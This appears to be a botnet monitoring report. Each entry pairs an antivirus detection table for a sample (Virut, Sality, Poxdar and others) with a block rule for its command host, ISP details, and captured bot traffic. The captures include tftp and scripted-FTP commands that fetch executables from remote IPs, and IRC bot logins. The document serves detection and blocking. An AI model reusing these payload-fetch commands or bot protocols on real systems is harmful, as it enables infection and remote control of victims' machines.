- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com MODE #l# +m
- Server: :|!X@admin.com MODE #l# +m
- Server: PONG :MBoY.Org
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 3308 |
| Filter | deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi |
| ISP | nebula oy. web hosting pri-dns and streaming |
| Clients | 1 |
| Country | finland |
| Domain | nebula.fi |

Activity: Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 125.4.228.60 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 125.4.228.60 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
- Server: :hub.82.net 001 P|m80s5khyj...
- Client: USERHOST P|m80s5khyj
- Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
- Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
- Client: PRIVMSG #mm...
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Virut.7116 |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Virtob.8.Gen |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | Virut.30 |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Virut.7116 |
| F-Secure | Virut.av |
| Ikarus | Kolabc |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Virut.AG |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 80 216 |
| Filter | deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com |
| ISP | godaddy.com inc |
| Clients | 1 |
| Country | united states |
| Domain | jws.com |

Activity: Chatter Example
- Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
- Client: USER anonymous
- Client: PASS bin
- Server: RETR 12394_upload.exe
- Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
- Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
- Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
- Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
- Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
- Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
- Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
- Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
- Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
- Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
- Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
- Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...
BotClient Antivirus Diagnoses
| AhnLab-V3 | Kashu.B |
| AntiVir | Sality.Y |
| Authentium | Sasser.E |
| Avast | _Sality |
| AVG | I-Sasser.E |
| BitDefender | Generic.24440 |
| CAT-QuickHeal | Sality.R |
| ClamAV | Sasser.H |
| DrWeb | Sector.5 |
| eSafe | MISSED |
| eTrust-Vet | Sality.AA |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Sality.AA |
| F-Prot | Sasser.E |
| F-Secure | Sasser.D |
| Ikarus | Email-Plexus.E |
| Kaspersky | Sality.aa |
| McAfee | Sality.gen |
| Microsoft | Sality.AM |
| NOD32v2 | MISSED |
| Norman | Sasser.E |
| Panda | Sasser.E.worm |
| Prevx1 | MISSED |
| Rising | KUKU.GEN |
| Sophos | Sality-AM |
| Sunbelt | MISSED |
| Symantec | Sality.AE |
| TheHacker | Sality.gen |
| TrendMicro | PE_SALITY.EN |
| VBA32 | Sality.kaka |
| VirusBuster | Sasser.E |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 80 |
| Filter | deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru |
| ISP | sovintel-msk-netbridge-ervices-net |
| Clients | 1 |
| Country | russian federation |
| Domain | mail.ru |

Activity: Chatter Example
- Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
- Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Heuristic-MUP!Eldorado |
| Avast | _Padobot-D@UPX |
| AVG | MISSED |
| BitDefender | Generic.69904 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | WormPoxdar.A.D |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Heuristic-MUP!Eldorado |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Poxdar.A |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalHckPk-E |
| Sunbelt | MISSED |
| Symantec | Poxdar |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 3305 |
| Filter | deny ip host 203.146.251.62 any log ! 1 infects 11/03/09 to 11/03/09 csloxinfo.net |
| ISP | reassign to paidc idc suapha-idc customer |
| Clients | 1 |
| Country | thailand |
| Domain | csloxinfo.net |

Activity: Chatter Example
- Client: PASS secretpass
- Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
- Server: :hub.62014.net 001 P|ot4z09bbz...
- Client: USERHOST P|ot4z09bbz
- Server: :hub.62014.net 302 P|ot4z09bbz...
- Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
- Client: PRIVMSG #mm...
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | MISSED |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Heur.Generic |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalPacker |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | PackedYoda |
| Webwasher Gateway | MISSED |
